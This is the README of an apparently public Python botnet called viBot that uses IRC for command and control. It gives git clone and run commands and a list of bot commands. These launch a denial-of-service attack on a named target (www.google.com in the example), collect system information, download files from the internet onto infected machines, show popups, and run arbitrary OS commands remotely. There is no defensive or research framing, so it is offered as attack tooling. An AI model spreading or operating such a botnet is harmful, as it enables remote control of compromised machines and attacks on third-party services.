A fully native and cross-platform botnet project, that uses IRC as C&C server.
~$ git clone https://github.com/blackvkng/viBot.git
~$ cd viBot
~$ python2 viBot.py
irc client: [module] [ARGS]
dos module // start a dos attack to target
- usage
- irc client: dos set target www.google.com
- irc client: dos start
- usage
info module // get some info about target system
- usage
- irc client: info
- usage
wget module // download files to target from internet
- usage
- irc client: wget FILEURL FILE NAME TO SAVE
- usage
popup module // show a popup message on target system
- usage
- irc client: popup TEXT
- usage
execute module // execute os commands on target and get output of commands
- usage
- irc client: execute COMMAND
- usage